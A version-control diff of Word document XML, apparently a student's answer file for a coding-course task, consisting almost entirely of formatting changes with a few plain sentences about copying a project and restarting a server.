+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i21" o:spid="_x0000_s21" type="#_x0000_t75" style="width:540.00pt;height:167.19pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId30" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
+        <w:t xml:space="preserve">The previous stuff was gone because I restarted the server.</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:sectPr>
       <w:footnotePr/>

--- a/sit218_coding/task33d/ans1.docx
+++ b/sit218_coding/task33d/ans1.docx
@@ -17,24 +17,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="830"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Step 1
-</w:t>
-      </w:r>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
@@ -45,7 +27,11 @@
       <w:r>
         <w:t xml:space="preserve">I first copied the project.</w:t>
       </w:r>
-      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -133,10 +119,19 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
-      <w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
         <w:rPr>
           <w:highlight w:val="none"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
